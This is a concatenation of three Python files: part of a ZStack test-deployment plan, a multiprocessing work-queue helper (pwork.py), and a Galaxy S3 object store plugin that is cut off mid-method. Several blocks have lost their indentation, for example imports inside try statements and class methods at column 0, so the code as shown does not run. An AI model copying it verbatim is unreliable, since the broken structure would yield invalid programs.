        # NOTE(review): lib_files ships zstacklib-1.0.0.tar.gz, but the
        # ansible args below pass pkg_zstacklib=zstacklib-1.0.tar.gz --
        # confirm the differing version strings are intentional.
        lib_files = ['testagent/zstacktestagent-1.0.0.tar.gz', \
                'testagent/zstacklib-1.0.0.tar.gz' ]
        if not target:
            #default will deploy all test hosts.
            exc_info = []
            for h in self.test_agent_hosts:
                print('Deploy test agent in host: [%s] \n' % h.managementIp_)
                ansible_cmd_args = "host=%s \
pkg_testagent=zstacktestagent-1.0.0.tar.gz \
pkg_zstacklib=zstacklib-1.0.tar.gz \
pypi_source_tar=pypi.tar.bz" % \
                        h.managementIp_
                if ENV_HTTP_PROXY:
                    ansible_cmd_args = "%s http_proxy=%s https_proxy=%s" % \
                            (ansible_cmd_args, ENV_HTTP_PROXY, ENV_HTTPS_PROXY)
                ansible_cmd = "testagent.yaml -e '%s'" % ansible_cmd_args
                thread = threading.Thread(target=ansible.execute_ansible,\
                        args=(h.managementIp_, h.username_, h.password_,\
                        testagentdir, ansible_cmd, lib_files, exc_info))
                # Wrap up old zstack logs in /var/log/zstack/
                print('archive test log on host: [%s] \n' % h.managementIp_)
                try:
                    log.cleanup_log(h.managementIp_, h.username_, h.password_)
                except Exception as e:
                    print "clean up old testing logs meet execption on management node: %s" % h.managementIp_
                    raise e
                thread.start()
            #if localhost is not in hosts, should do log archive for zstack
            log.cleanup_local_log()
            self._wait_for_thread_completion('install test agent', 200)
            for h in self.test_agent_hosts:
                if not linux.wait_callback_success(_wait_echo, h.managementIp_, 5, 0.2, True):
                    raise ActionError('testagent is not start up in 5s on %s, after it is deployed by ansible.' % h.managementIp_)
        else:
            print('Deploy test agent in host: %s \n' % target.managementIp)
            ansible_cmd_args = "host=%s \
pkg_testagent=zstacktestagent-1.0.0.tar.gz \
pkg_zstacklib=zstacklib-1.0.tar.gz \
pypi_source_tar=pypi.tar.bz" % \
                    target.managementIp
            if ENV_HTTP_PROXY:
                ansible_cmd_args = "%s http_proxy=%s https_proxy=%s" % \
                        (ansible_cmd_args, ENV_HTTP_PROXY, ENV_HTTPS_PROXY)
            ansible_cmd = "testagent.yaml -e '%s'" % ansible_cmd_args
            ansible.execute_ansible(target.managementIp, target.username, \
                    target.password, testagentdir, ansible_cmd, lib_files)
            if not linux.wait_callback_success(_wait_echo, target.managementIp, 5, 0.2):
                raise ActionError('testagent is not start up in 5s on %s, after it is deployed by ansible.' % target.managementIp)
    finally:
        # Always remove the unpacked bundle, even on failure.
        if testagentdir:
            shell.call('rm -rf %s' % testagentdir)
def execute_plan_without_deploy_test_agent(self):
    """Full fresh deployment, assuming test agents are already deployed.

    Best-effort teardown of anything currently running, then install,
    deploy db + rabbitmq, install remote nodes and start everything.
    """
    try:
        self._stop_nodes()
        shell.call('zstack-ctl kairosdb --stop')
        shell.call('zstack-ctl cassandra --stop')
    except:
        # Teardown is best-effort; services may simply not be running.
        pass
    self._install_local_zstack()
    self._deploy_db()
    self._deploy_rabbitmq()
    self._install_management_nodes()
    self._set_extra_node_config()
    self._start_multi_nodes(restart=True)
def deploy_db_without_reinstall_zstack(self):
    """Redeploy only the database, stopping and restarting the management
    nodes around it; zstack itself is left untouched."""
    self.deploy_test_agent()
    self._stop_nodes()
    self._deploy_db()
    self._start_multi_nodes()
def restart_war_on_all_nodes(self):
    """Upgrade zstack in place and restart the war on every planned node."""
    #planed_nodes = []
    #for node in self.nodes:
    #    planed_nodes.append(node.ip_)
    #import socket
    #planed_nodes.append(socket.gethostbyname(socket.gethostname()))
    #live_nodes_inv = res_ops.query_resource(res_ops.MANAGEMENT_NODE, [])
    #set ZSTACK_HOME, which will be used by zstack-ctl
    os.environ['ZSTACK_HOME'] = '%s/apache-tomcat/webapps/zstack/' % \
            self.install_path
    # Currently always empty: the live-node discovery above is disabled.
    not_restarted_nodes = []
    #for live_node_inv in live_nodes_inv:
    #    if not live_node_inv.hostName in planed_nodes:
    #        not_restarted_nodes.append(live_node_inv.hostName)
    self.deploy_test_agent()
    self._stop_nodes()
    self._upgrade_local_zstack()
    #self._deploy_db(keep_db = True)
    self._upgrade_management_nodes()
    self._set_extra_node_config()
    self._start_multi_nodes()
    if not_restarted_nodes:
        print('Following node are not restarted, since they are not defined in deploy.xml : %s' % not_restarted_nodes)
    else:
        nodes_ip = ''
        for node in self.nodes:
            # NOTE(review): reads node.ip__ (optional accessor) while the
            # rest of the class reads node.ip_ -- confirm intended.
            nodes_ip = '%s %s' % (nodes_ip, node.ip__)
        print('\nAll nodes:%s have been restarted!\n' % nodes_ip)
def execute_plan(self):
    """Deploy test agents, then run the full fresh-deployment sequence."""
    self.deploy_test_agent()
    self.execute_plan_without_deploy_test_agent()
def _start_multi_nodes(self, restart = False):
    """Start every planned management node (host- or docker-based) in
    parallel threads, then wait until each reports started.

    :param restart: when True, nodes marked reserve__ are started too
        (they are normally left to test cases).
    """
    nodes = []
    threads = []
    for node in self.nodes:
        #The reserved node is used by test cases.
        if not restart and node.reserve__:
            continue
        if not node.dockerImage__:
            print 'Deploy node in hosts'
            #consider some zstack-server is running in vm, the server
            # startup speed is slow. Increase timeout to 180s.
            cmd = 'zstack-ctl stop_node --host=%s ; zstack-ctl start_node --host=%s --timeout=180' % (node.ip_, node.ip_)
            thread = threading.Thread(target=shell_cmd_thread, args=(cmd, True, ))
            threads.append(thread)
        else:
            print 'Deploy node in docker'
            docker_node = DockerNode(self)
            docker_node.set_docker_image(node.dockerImage__)
            docker_node.set_node_ip(node.ip__)
            docker_node.prepare_node()
            nodes.append(docker_node)
            thread = threading.Thread(target=docker_node.start_node)
            threads.append(thread)
    for thread in threads:
        thread.start()
    self._wait_for_thread_completion('start management node', 200)
    # Re-raise the first worker failure with its original traceback
    # (py2 three-argument raise).
    if node_exception:
        print 'node start meets exception:'
        info1 = node_exception[0][1]
        info2 = node_exception[0][2]
        raise info1, None, info2
    current_time = time.time()
    #largest timeout time for multi nodes startup is 300s
    timeout_time = current_time + 300
    for node in self.nodes:
        #The reserved node is used by test cases.
        if node.reserve__:
            continue
        # Shrink the per-node wait so all checks share the 300s budget.
        new_time = time.time()
        if new_time >= timeout_time:
            new_timeout = 1
        else:
            new_timeout = timeout_time - new_time
        if not linux.wait_callback_success(\
                node_ops.is_management_node_start, \
                node.ip_, timeout=new_timeout, interval=0.5):
            raise ActionError('multi node does not startup on host: %s' \
                    % node.ip_)
    zstack_home = '%s/apache-tomcat/webapps/zstack/' % self.install_path
    cmd = 'zstack-ctl setenv ZSTACK_HOME=%s' % zstack_home
    shell.call(cmd)
def stop_node(self):
    """Stop all management nodes defined in the plan."""
    print 'Begin to stop node ...'
    self._stop_nodes()
def _stop_nodes(self):
    """Stop every planned node in parallel: docker-based nodes via
    DockerNode.stop_node, host-based ones via zstack-ctl."""
    nodes = []
    for node in self.nodes:
        if node.dockerImage__:
            docker_node = DockerNode(self)
            docker_node.set_node_ip(node.ip__)
            nodes.append(docker_node)
            thread = threading.Thread(target=docker_node.stop_node)
            thread.start()
            # NOTE(review): cleanup() runs right after start() without
            # joining the stop thread -- confirm no race with stop_node().
            docker_node.cleanup()
        else:
            #Woodpecker need to set no ssh password for all nodes.
            cmd = 'zstack-ctl stop_node --host=%s -f' % node.ip_
            thread = threading.Thread(target=shell_cmd_thread, args=(cmd, True))
            thread.start()
    # Best effort: do not raise if some node fails to stop in time.
    self._wait_for_thread_completion('stop management node', 40, \
            raise_exception = False)
def disable_db_deployment(self):
    """Make subsequent _deploy_db() calls a no-op."""
    self.need_deploy_db = False
def __init__(self, plan_config):
    """Capture the parsed deploy config, initialize all plan state, then
    validate it via _set_and_validate_config()."""
    self.config = plan_config
    self.zstack_pkg = None               # all-in-one zstack package path
    self.zstack_install_script = None    # install script path
    self.install_path = None             # zstack install root
    self.test_agent_path = None          # test agent tarball path
    self.test_agent_hosts = []           # hosts that receive the test agent
    self.nodes = []                      # management node xml objects
    self.catalina_home = None            # tomcat root under install_path
    self.tomcat = None
    #self.elasticsearch_home = None
    #self.recreate_elasticsearch_index = False
    self.wait_for_start_timeout = None   # MN startup timeout (seconds)
    self.deploy_config_path = plan_config.deployConfigPath_
    self.deploy_config_tmpt_path = plan_config.deployConfigTemplatePath__
    self.plan_base_path = os.path.dirname(plan_config.deployConfigPath_)
    self.need_deploy_db = False
    self.rabbitmq_server = 'localhost'
    #default db information
    self.db_server = 'localhost'
    self.db_username = 'zstack'
    self.db_password = ''
    self.db_port = '3306'
    self.zstack_properties = None
    self.wait_for_deploy_testagent_timeout = 300
    self._set_and_validate_config()
class SetupAction(object):
    """Action that builds a Plan from a deploy config and executes it."""

    def __init__(self):
        self.plan = None   # plan config handed to Plan()
        self.out = None    # output placeholder

    def run(self):
        """Create the Plan, execute the full deployment and return it."""
        deployment = Plan(self.plan)
        deployment.execute_plan()
        return deployment
|
pwork.py | from multiprocessing import Process, Queue
import time
try:
from Queue import Empty
except ImportError:
from queue import Empty
import logging
import six
class Stop(object):
    """Sentinel type: an instance on the task queue tells a Worker to exit."""
    pass


# Shared sentinel instance; one is queued per worker at shutdown.
STOP = Stop()


class Worker(Process):
    """Process that consumes tasks from ``taskq`` and emits results.

    Applies ``callback`` to each task and puts the return value on
    ``resultq``. A ``Stop`` instance ends the loop. When
    ``ignore_exceptions`` is true, callback errors are logged and the task
    skipped; otherwise the exception propagates and kills the worker.
    """

    def __init__(self, callback, taskq, resultq, ignore_exceptions, *args, **kwargs):
        self.callback = callback
        self.taskq = taskq
        self.resultq = resultq
        self.ignore_exceptions = ignore_exceptions
        Process.__init__(self, *args, **kwargs)

    def run(self):
        while True:
            job = self.taskq.get()
            if isinstance(job, Stop):
                return
            try:
                self.resultq.put(self.callback(job))
            except Exception as ex:
                if not self.ignore_exceptions:
                    raise
                logging.error('', exc_info=ex)
def make_work(callback, tasks, limit, ignore_exceptions=True,
              taskq_size=50):
    """
    Run up to "limit" processes, do tasks and yield results.

    :param callback: the function that will process single task
    :param tasks: the sequence or iterator or queue of tasks, each task
        in turn is sequence of arguments, if task is just single argument
        it should be wrapped into list or tuple
    :param limit: the maximum number of processes
    :param ignore_exceptions: when True, worker exceptions are logged and
        the failing task skipped instead of killing the worker
    :param taskq_size: bound on the task queue so a fast producer cannot
        run arbitrarily far ahead of the workers
    """
    # If tasks is number convert it to the list of number
    if isinstance(tasks, int):
        tasks = six.moves.range(tasks)
    # Ensure that tasks sequence is iterator
    tasks = iter(tasks)
    taskq = Queue(taskq_size)
    # Here results of task processing will be saved
    resultq = Queue()
    # Prepare and run up to "limit" processes
    processes = []
    for x in six.moves.range(limit):
        process = Worker(callback, taskq, resultq, ignore_exceptions)
        process.daemon = True
        process.start()
        processes.append(process)
    # Put tasks from tasks iterator to taskq queue
    # until tasks iterator ends
    # Do it in separate process
    def task_processor(task_iter, task_queue, limit):
        try:
            for task in task_iter:
                task_queue.put(task)
        finally:
            # Always deliver one STOP sentinel per worker -- even if the
            # task iterator raises -- so every worker can shut down.
            for x in six.moves.range(limit):
                task_queue.put(STOP)
    processor = Process(target=task_processor, args=[tasks, taskq, limit])
    processor.daemon = True
    processor.start()
    # Drain results with a short poll while any worker is still alive.
    while True:
        try:
            yield resultq.get(True, 0.2)
        except Empty:
            pass
        if not any(x.is_alive() for x in processes):
            break
    # Workers are gone; flush whatever results are still buffered.
    while True:
        try:
            yield resultq.get(False)
        except Empty:
            break
if __name__ == '__main__':
    # Usage example: three lazily generated tasks processed by two workers.
    # (The original nested a second, always-true `if __name__ == '__main__':`
    # inside this guard; the redundant inner guard is removed.)
    from multiprocessing import current_process
    import logging
    from random import random
    import time

    def worker(arg):
        # Toy task callback: sleep a bit, return (process name, arg).
        logging.debug('Processing %s' % arg)
        time.sleep(random())
        return current_process().name, arg

    def tasks():
        # Lazily generate three tasks, each wrapped in a 1-tuple.
        for x in six.moves.range(3):
            logging.debug('Generating task #%d' % x)
            time.sleep(random())
            yield (x,)

    def main():
        for res in make_work(worker, tasks(), 2):
            logging.debug('Result %s received from process %s' % (res[1], res[0]))

    logging.basicConfig(level=logging.DEBUG, format='%(processName)s %(message)s')
    main()
|
s3.py | """
Object Store plugin for the Amazon Simple Storage Service (S3)
"""
import logging
import multiprocessing
import os
import shutil
import subprocess
import threading
import time
from datetime import datetime
from galaxy.exceptions import ObjectInvalid, ObjectNotFound
from galaxy.util import (
directory_hash_id,
safe_relpath,
string_as_bool,
umask_fix_perms,
which,
)
from galaxy.util.sleeper import Sleeper
from .s3_multipart_upload import multipart_upload
from ..objectstore import convert_bytes, ObjectStore
try:
# Imports are done this way to allow objectstore code to be used outside of Galaxy.
import boto
from boto.exception import S3ResponseError
from boto.s3.key import Key
from boto.s3.connection import S3Connection
except ImportError:
boto = None
# Shown at construction time when boto cannot be imported. The two adjacent
# literals concatenate at compile time; the trailing space on the first line
# is required -- without it the message read "...available.Please install...".
NO_BOTO_ERROR_MESSAGE = ("S3/Swift object store configured, but no boto dependency available. "
                         "Please install and properly configure boto or modify object store configuration.")

log = logging.getLogger(__name__)
logging.getLogger('boto').setLevel(logging.INFO)  # Otherwise boto is quite noisy
class S3ObjectStore(ObjectStore):
"""
Object store that stores objects as items in an AWS S3 bucket. A local
cache exists that is used as an intermediate location for files between
Galaxy and S3.
"""
def __init__(self, config, config_xml):
    """Build the store from Galaxy config plus the <object_store> XML node.

    Parses auth/bucket/connection/cache settings, opens the S3 connection,
    resolves the bucket, and starts the cache-cleaning thread.

    :raises Exception: when boto is not importable.
    """
    if boto is None:
        raise Exception(NO_BOTO_ERROR_MESSAGE)
    super(S3ObjectStore, self).__init__(config)
    self.staging_path = self.config.file_path
    self.transfer_progress = 0
    self._parse_config_xml(config_xml)
    self._configure_connection()
    self.bucket = self._get_bucket(self.bucket)
    # Clean cache only if value is set in galaxy.ini
    if self.cache_size != -1:
        # Convert GBs to bytes for comparison
        self.cache_size = self.cache_size * 1073741824
    # Helper for interruptable sleep
    self.sleeper = Sleeper()
    # NOTE(review): the monitor thread is started even when cache_size is
    # -1 (unlimited); __cache_monitor then compares against a negative
    # limit and would trigger cleaning constantly -- confirm whether the
    # thread should be skipped for cache_size == -1.
    self.cache_monitor_thread = threading.Thread(target=self.__cache_monitor)
    self.cache_monitor_thread.start()
    log.info("Cache cleaner manager started")
    # Test if 'axel' is available for parallel download and pull the key into cache
    if which('axel'):
        self.use_axel = True
    else:
        self.use_axel = False
def _configure_connection(self):
    """Open the boto S3 connection with the parsed access/secret keys."""
    log.debug("Configuring S3 Connection")
    self.conn = S3Connection(self.access_key, self.secret_key)
def _parse_config_xml(self, config_xml):
    """Read auth/bucket/connection/cache/extra_dir settings from the
    <object_store> XML element into instance attributes.

    Logs and re-raises any parsing error, since the store cannot work
    with a malformed configuration.
    """
    try:
        a_xml = config_xml.findall('auth')[0]
        self.access_key = a_xml.get('access_key')
        self.secret_key = a_xml.get('secret_key')
        b_xml = config_xml.findall('bucket')[0]
        self.bucket = b_xml.get('name')
        self.use_rr = string_as_bool(b_xml.get('use_reduced_redundancy', "False"))
        self.max_chunk_size = int(b_xml.get('max_chunk_size', 250))
        # <connection> is optional; an empty dict exposes the same .get API.
        cn_xml = config_xml.findall('connection')
        if not cn_xml:
            cn_xml = {}
        else:
            cn_xml = cn_xml[0]
        self.host = cn_xml.get('host', None)
        self.port = int(cn_xml.get('port', 6000))
        self.multipart = string_as_bool(cn_xml.get('multipart', 'True'))
        self.is_secure = string_as_bool(cn_xml.get('is_secure', 'True'))
        self.conn_path = cn_xml.get('conn_path', '/')
        c_xml = config_xml.findall('cache')[0]
        self.cache_size = float(c_xml.get('size', -1))
        self.staging_path = c_xml.get('path', self.config.object_store_cache_path)
        for d_xml in config_xml.findall('extra_dir'):
            self.extra_dirs[d_xml.get('type')] = d_xml.get('path')
        log.debug("Object cache dir: %s", self.staging_path)
        # NOTE(review): raises KeyError if no extra_dir of type 'job_work'
        # was configured -- confirm the config schema guarantees one.
        log.debug(" job work dir: %s", self.extra_dirs['job_work'])
        # for multipart upload
        self.s3server = {'access_key': self.access_key,
                         'secret_key': self.secret_key,
                         'is_secure': self.is_secure,
                         'max_chunk_size': self.max_chunk_size,
                         'host': self.host,
                         'port': self.port,
                         'use_rr': self.use_rr,
                         'conn_path': self.conn_path}
    except Exception:
        # Toss it back up after logging, we can't continue loading at this point.
        log.exception("Malformed ObjectStore Configuration XML -- unable to continue")
        raise
def __cache_monitor(self):
    """Background loop: every 30s, keep the local cache below 90% of
    cache_size by deleting least-recently-accessed files first."""
    time.sleep(2)  # Wait for things to load before starting the monitor
    while self.running:
        total_size = 0
        # Is this going to be too expensive of an operation to be done frequently?
        file_list = []
        for dirpath, _, filenames in os.walk(self.staging_path):
            for filename in filenames:
                filepath = os.path.join(dirpath, filename)
                file_size = os.path.getsize(filepath)
                total_size += file_size
                # Get the time given file was last accessed
                # (os.stat() index 7 is st_atime)
                last_access_time = time.localtime(os.stat(filepath)[7])
                # Compose a tuple of the access time and the file path
                file_tuple = last_access_time, filepath, file_size
                file_list.append(file_tuple)
        # Sort the file list (based on access time)
        file_list.sort()
        # Initiate cleaning once within 10% of the defined cache size?
        # NOTE(review): when cache_size was never set (-1) this limit is
        # negative, so cleaning always triggers -- confirm the monitor is
        # meant to run at all in that case (see __init__).
        cache_limit = self.cache_size * 0.9
        if total_size > cache_limit:
            log.info("Initiating cache cleaning: current cache size: %s; clean until smaller than: %s",
                     convert_bytes(total_size), convert_bytes(cache_limit))
            # How much to delete? If simply deleting up to the cache-10% limit,
            # is likely to be deleting frequently and may run the risk of hitting
            # the limit - maybe delete additional #%?
            # For now, delete enough to leave at least 10% of the total cache free
            delete_this_much = total_size - cache_limit
            self.__clean_cache(file_list, delete_this_much)
        self.sleeper.sleep(30)  # Test cache size every 30 seconds?
def __clean_cache(self, file_list, delete_this_much):
    """ Keep deleting files from the file_list until the size of the deleted
    files is greater than the value in delete_this_much parameter.

    :type file_list: list
    :param file_list: List of candidate files that can be deleted. Files are
        removed from the front of the list, so it must be sorted with the
        oldest (least recently accessed) entries first. Each entry is a
        3-tuple: (access time as time.struct_time, file path, file size).
    :type delete_this_much: int
    :param delete_this_much: Total size of files, in bytes, that should be deleted.
    """
    freed = 0
    for _access_time, path, size in file_list:
        if freed >= delete_this_much:
            # Freed enough space; stop and report.
            log.debug("Cache cleaning done. Total space freed: %s", convert_bytes(freed))
            return
        freed += size
        os.remove(path)
def _get_bucket(self, bucket_name):
    """ Sometimes a handle to a bucket is not established right away so try
    it a few times. Raise error is connection is not established. """
    for i in range(5):
        try:
            bucket = self.conn.get_bucket(bucket_name)
            log.debug("Using cloud object store with bucket '%s'", bucket.name)
            return bucket
        except S3ResponseError:
            # Bucket may simply not exist yet; try to create it, then retry.
            try:
                log.debug("Bucket not found, creating s3 bucket with handle '%s'", bucket_name)
                self.conn.create_bucket(bucket_name)
            except S3ResponseError:
                log.exception("Could not get bucket '%s', attempt %s/5", bucket_name, i + 1)
            time.sleep(2)
    # All the attempts have been exhausted and connection was not established,
    # raise error
    # NOTE(review): this raises the S3ResponseError *class* without the
    # (status, reason) arguments its constructor takes, so the surfaced
    # error is confusing -- consider raising a constructed exception.
    raise S3ResponseError
def _fix_permissions(self, rel_path):
    """Recursively normalize permissions under rel_path via umask_fix_perms:
    0o777 base for directories, 0o666 for regular files; symlinks skipped."""
    for dirpath, _dirs, names in os.walk(rel_path):
        umask_fix_perms(dirpath, self.config.umask, 0o777, self.config.gid)
        for name in names:
            full = os.path.join(dirpath, name)
            # Symlink targets are left untouched.
            if not os.path.islink(full):
                umask_fix_perms(full, self.config.umask, 0o666, self.config.gid)
def _construct_path(self, obj, base_dir=None, dir_only=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False, **kwargs):
    """Build the bucket-relative (or extra_dir-based local) path for obj.

    :param obj: object whose ``id`` drives the hashed directory layout
    :param base_dir: key into self.extra_dirs; when set, the path is joined
        under that local dir and returned without the S3 trailing '/'
    :param dir_only: return only the folder path, no file name
    :param extra_dir: extra path component, prepended when
        extra_dir_at_root is true, otherwise appended
    :param alt_name: alternate file name (validated against path escapes)
    :param obj_dir: also append str(obj.id) as a directory (JOB_WORK)
    :raises ObjectInvalid: for unnormalized extra_dir or unsafe alt_name
    """
    # extra_dir should never be constructed from provided data but just
    # make sure there are no shenannigans afoot
    if extra_dir and extra_dir != os.path.normpath(extra_dir):
        log.warning('extra_dir is not normalized: %s', extra_dir)
        raise ObjectInvalid("The requested object is invalid")
    # ensure that any parent directory references in alt_name would not
    # result in a path not contained in the directory path constructed here
    if alt_name:
        if not safe_relpath(alt_name):
            log.warning('alt_name would locate path outside dir: %s', alt_name)
            raise ObjectInvalid("The requested object is invalid")
        # alt_name can contain parent directory references, but S3 will not
        # follow them, so if they are valid we normalize them out
        alt_name = os.path.normpath(alt_name)
    rel_path = os.path.join(*directory_hash_id(obj.id))
    if extra_dir is not None:
        if extra_dir_at_root:
            rel_path = os.path.join(extra_dir, rel_path)
        else:
            rel_path = os.path.join(rel_path, extra_dir)
    # for JOB_WORK directory
    if obj_dir:
        rel_path = os.path.join(rel_path, str(obj.id))
    if base_dir:
        base = self.extra_dirs.get(base_dir)
        return os.path.join(base, rel_path)
    # S3 folders are marked by having trailing '/' so add it now
    rel_path = '%s/' % rel_path
    if not dir_only:
        rel_path = os.path.join(rel_path, alt_name if alt_name else "dataset_%s.dat" % obj.id)
    return rel_path
def _get_cache_path(self, rel_path):
    """Absolute location of ``rel_path`` inside the local staging cache."""
    return os.path.abspath(os.path.join(self.staging_path, rel_path))
def _get_transfer_progress(self):
    """Current transfer progress counter, as accumulated by _transfer_cb."""
    return self.transfer_progress
def _get_size_in_s3(self, rel_path):
    """Return the size in bytes of the S3 key at ``rel_path``, or -1 when
    the key is missing or the lookup fails."""
    try:
        key = self.bucket.get_key(rel_path)
        if key:
            return key.size
    except S3ResponseError:
        log.exception("Could not get size of key '%s' from S3", rel_path)
    return -1
def _key_exists(self, rel_path):
    """Return True if ``rel_path`` exists in the bucket.

    Folders are detected by a trailing '/' and checked via a prefix
    listing; plain files are checked with Key.exists(). Returns False
    when the S3 request errors out.

    :raises ObjectInvalid: if ``rel_path`` is absolute -- keys must be
        bucket-relative, so an absolute path indicates a path-construction
        bug upstream.
    """
    # BUG FIX: the original performed this sanity check *after* the lookup
    # with a bare `raise` and no active exception, which itself blows up
    # with an unhelpful RuntimeError. Check first and raise a descriptive
    # error (ObjectInvalid, consistent with _construct_path) before
    # touching S3 at all.
    if rel_path[0] == '/':
        raise ObjectInvalid("S3 key must be relative, got absolute path: %s" % rel_path)
    exists = False
    try:
        # A hackish way of testing if the rel_path is a folder vs a file
        is_dir = rel_path[-1] == '/'
        if is_dir:
            keyresult = self.bucket.get_all_keys(prefix=rel_path)
            exists = len(keyresult) > 0
        else:
            exists = Key(self.bucket, rel_path).exists()
    except S3ResponseError:
        log.exception("Trouble checking existence of S3 key '%s'", rel_path)
        return False
    return exists
def _in_cache(self, rel_path):
    """ Check if the given dataset is in the local cache and return True if so. """
    # TODO: ideally this would also confirm the cached file's size matches
    # the copy in S3; that check is not reliably implementable until the
    # upload tool explicitly creates datasets, because a size mismatch can
    # also just mean the file is currently being uploaded.
    return os.path.exists(self._get_cache_path(rel_path))
def _pull_into_cache(self, rel_path):
    """Download ``rel_path`` from S3 into the local cache, fixing local
    permissions afterwards; returns whatever _download() reported."""
    # Ensure the cache directory structure exists (e.g., dataset_#_files/)
    rel_path_dir = os.path.dirname(rel_path)
    if not os.path.exists(self._get_cache_path(rel_path_dir)):
        os.makedirs(self._get_cache_path(rel_path_dir))
    # Now pull in the file
    file_ok = self._download(rel_path)
    self._fix_permissions(self._get_cache_path(rel_path_dir))
    return file_ok
def _transfer_cb(self, complete, total):
    """boto progress callback. Transfers are configured with num_cb=10, so
    each invocation advances progress by 10 (percent); the complete/total
    arguments are unused."""
    self.transfer_progress += 10
def _download(self, rel_path):
    """Download ``rel_path`` from S3 into the local cache.

    Returns True on success, False when the file exceeds the configured
    cache size or the S3 request fails. Uses axel for parallel download
    when available, otherwise boto's chunked download with progress
    callbacks.
    """
    try:
        log.debug("Pulling key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
        key = self.bucket.get_key(rel_path)
        # Test if cache is large enough to hold the new file
        if self.cache_size > 0 and key.size > self.cache_size:
            log.critical("File %s is larger (%s) than the cache size (%s). Cannot download.",
                         rel_path, key.size, self.cache_size)
            return False
        if self.use_axel:
            log.debug("Parallel pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
            ncores = multiprocessing.cpu_count()
            url = key.generate_url(7200)
            # BUG FIX: subprocess.call requires every argv element to be a
            # string; passing the int ncores raised TypeError, so the axel
            # path could never succeed.
            ret_code = subprocess.call(['axel', '-a', '-n', str(ncores), url])
            if ret_code == 0:
                return True
            # NOTE(review): on axel failure this falls through and returns
            # None (falsy) instead of retrying with boto -- confirm intended.
        else:
            log.debug("Pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
            self.transfer_progress = 0  # Reset transfer progress counter
            key.get_contents_to_filename(self._get_cache_path(rel_path), cb=self._transfer_cb, num_cb=10)
            return True
    except S3ResponseError:
        log.exception("Problem downloading key '%s' from S3 bucket '%s'", rel_path, self.bucket.name)
        return False
def _push_to_os(self, rel_path, source_file=None, from_string=None):
    """
    Push the file pointed to by ``rel_path`` to the object store naming the key
    ``rel_path``. If ``source_file`` is provided, push that file instead while
    still using ``rel_path`` as the key name.
    If ``from_string`` is provided, set contents of the file to the value of
    the string.
    Returns True on success; False when the source file is missing or the
    S3 call fails.
    """
    try:
        # Default to the cached copy of the object when no explicit source
        # file is given.
        source_file = source_file if source_file else self._get_cache_path(rel_path)
        if os.path.exists(source_file):
            key = Key(self.bucket, rel_path)
            # Skip no-op pushes: an empty local file over an existing key.
            if os.path.getsize(source_file) == 0 and key.exists():
                log.debug("Wanted to push file '%s' to S3 key '%s' but its size is 0; skipping.", source_file, rel_path)
                return True
            # NOTE(review): an empty string is falsy, so from_string=''
            # (as passed by create()) takes the file-upload branch, not
            # this one — confirm that is intended.
            if from_string:
                key.set_contents_from_string(from_string, reduced_redundancy=self.use_rr)
                log.debug("Pushed data from string '%s' to key '%s'", from_string, rel_path)
            else:
                start_time = datetime.now()
                log.debug("Pushing cache file '%s' of size %s bytes to key '%s'", source_file, os.path.getsize(source_file), rel_path)
                mb_size = os.path.getsize(source_file) / 1e6
                # Small files — or multipart disabled — go up in a single
                # PUT; larger files use multipart upload.
                if mb_size < 10 or (not self.multipart):
                    self.transfer_progress = 0  # Reset transfer progress counter
                    key.set_contents_from_filename(source_file,
                                                   reduced_redundancy=self.use_rr,
                                                   cb=self._transfer_cb,
                                                   num_cb=10)
                else:
                    multipart_upload(self.s3server, self.bucket, key.name, source_file, mb_size)
                end_time = datetime.now()
                log.debug("Pushed cache file '%s' to key '%s' (%s bytes transfered in %s sec)",
                          source_file, rel_path, os.path.getsize(source_file), end_time - start_time)
            return True
        else:
            log.error("Tried updating key '%s' from source file '%s', but source file does not exist.",
                      rel_path, source_file)
    except S3ResponseError:
        log.exception("Trouble pushing S3 key '%s' from file '%s'", rel_path, source_file)
    # Reached on missing source file or after a logged S3 error.
    return False
def file_ready(self, obj, **kwargs):
    """
    A helper method that checks if a file corresponding to a dataset is
    ready and available to be used. Return ``True`` if so, ``False`` otherwise.

    "Ready" means the cached copy exists and its size matches the size
    reported by S3 (i.e. the transfer has completed in full).
    """
    rel_path = self._construct_path(obj, **kwargs)
    if not self._in_cache(rel_path):
        return False
    local_size = os.path.getsize(self._get_cache_path(rel_path))
    remote_size = self._get_size_in_s3(rel_path)
    if local_size == remote_size:
        return True
    log.debug("Waiting for dataset %s to transfer from OS: %s/%s", rel_path,
              local_size, remote_size)
    return False
def exists(self, obj, **kwargs):
    """Return True if the object exists in the cache and/or in S3.

    As a side effect, an object present in cache but absent from S3 is
    pushed to S3 before True is returned.
    """
    in_cache = in_s3 = False
    rel_path = self._construct_path(obj, **kwargs)
    # Check cache
    if self._in_cache(rel_path):
        in_cache = True
    # Check S3
    in_s3 = self._key_exists(rel_path)
    # log.debug("~~~~~~ File '%s' exists in cache: %s; in s3: %s" % (rel_path, in_cache, in_s3))
    # dir_only does not get synced so shortcut the decision
    dir_only = kwargs.get('dir_only', False)
    base_dir = kwargs.get('base_dir', None)
    if dir_only:
        if in_cache or in_s3:
            return True
        # for JOB_WORK directory: create it on demand and report success
        elif base_dir:
            if not os.path.exists(rel_path):
                os.makedirs(rel_path)
            return True
        else:
            return False
    # TODO: Sync should probably not be done here. Add this to an async upload stack?
    if in_cache and not in_s3:
        # Cache-only object: upload it so S3 becomes authoritative.
        self._push_to_os(rel_path, source_file=self._get_cache_path(rel_path))
        return True
    elif in_s3:
        return True
    else:
        return False
def create(self, obj, **kwargs):
    """Create the object identified by ``obj`` in cache and in S3.

    No-op if the object already exists. For non-directory objects an
    empty dataset file is created locally and pushed to S3.
    """
    if not self.exists(obj, **kwargs):
        # Pull out locally used fields
        extra_dir = kwargs.get('extra_dir', None)
        extra_dir_at_root = kwargs.get('extra_dir_at_root', False)
        dir_only = kwargs.get('dir_only', False)
        alt_name = kwargs.get('alt_name', None)
        # Construct hashed path
        rel_path = os.path.join(*directory_hash_id(obj.id))
        # Optionally append extra_dir
        if extra_dir is not None:
            if extra_dir_at_root:
                rel_path = os.path.join(extra_dir, rel_path)
            else:
                rel_path = os.path.join(rel_path, extra_dir)
        # Create given directory in cache
        cache_dir = os.path.join(self.staging_path, rel_path)
        if not os.path.exists(cache_dir):
            os.makedirs(cache_dir)
        # Although not really necessary to create S3 folders (because S3 has
        # flat namespace), do so for consistency with the regular file system
        # S3 folders are marked by having trailing '/' so add it now
